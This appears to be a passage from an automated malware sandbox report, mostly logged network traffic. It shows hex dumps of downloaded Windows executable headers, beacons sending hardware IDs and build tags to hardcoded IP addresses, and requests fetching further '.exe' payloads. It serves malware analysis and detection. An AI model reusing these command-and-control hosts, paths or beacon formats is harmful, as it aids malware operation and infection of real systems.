00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:49 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Thu, 24 Oct 2024 16:06:11 GMTConnection: keep-aliveETag: "671a7073-1c8c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 31 e6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 51 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 51 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 68 6c 69 71 6f 6b 00 80 19 00 00 e0 30 00 00 72 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 75 78 63 76 76 67 00 10 00 00 00 60 4a 00 00 04 00 00 00 66 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 6a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:56 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 d0 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 69 00 00 04 00 00 a1 56 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 65 74 7a 74 67 66 7a 00 70 19 00 00 50 4f 00 00 6a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 66 63 73 68 79 61 00 10 00 00 00 c0 68 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 68 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:09:58 GMTContent-Type: application/octet-streamContent-Length: 2863616Last-Modified: Thu, 24 Oct 2024 15:30:40 GMTConnection: keep-aliveETag: "671a6820-2bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 34 12 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 6e 68 69 61 6a 68 71 00 60 2b 00 00 a0 00 00 00 52 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 6d 76 6a 68 65 6e 00 20 00 00 00 00 2c 00 00 04 00 00 00 8c 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2c 00 00 22 00 00 00 90 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:10:00 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Thu, 24 Oct 2024 16:06:11 GMTConnection: keep-aliveETag: "671a7073-1c8c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 31 e6 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 51 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 51 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 68 6c 69 71 6f 6b 00 80 19 00 00 e0 30 00 00 72 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 75 78 63 76 76 67 00 10 00 00 00 60 4a 00 00 04 00 00 00 66 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 6a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 16:10:03 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Thu, 24 Oct 2024 16:06:04 GMTConnection: keep-aliveETag: "671a706c-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 d0 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 69 00 00 04 00 00 a1 56 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 65 74 7a 74 67 66 7a 00 70 19 00 00 50 4f 00 00 6a 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 66 63 73 68 79 61 00 10 00 00 00 c0 68 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 68 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 2d 2d 0d 0a Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="build"doma------CFBAKKJDBKJJJKFHDAEB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001226001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001227001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="build"doma------IECBGIDAEHCGDGCBKEBG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 32 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001228001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
